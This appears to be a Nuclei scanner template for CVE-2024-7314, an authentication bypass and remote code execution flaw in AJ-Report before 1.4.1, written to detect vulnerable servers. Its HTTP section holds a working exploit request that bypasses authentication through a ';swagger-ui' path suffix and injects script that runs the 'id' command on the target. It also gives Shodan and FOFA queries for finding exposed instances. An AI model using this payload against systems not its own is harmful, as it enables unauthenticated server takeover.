id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary Java code on the server through script engine injection, achieving complete system compromise and access to all application data.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later, which includes the security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.74583
    epss-percentile: 0.9888
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a0048304602210094c4a3e99571d9196bacb4ef10788b25673a6a4d87c13635b7564e40184c10bf0221009f129f4451a7e6e3c6af69e89e11f1be29147dd64cbe3f58f646c3d1c159994e:922c64590222798bb761d5b6d8e72950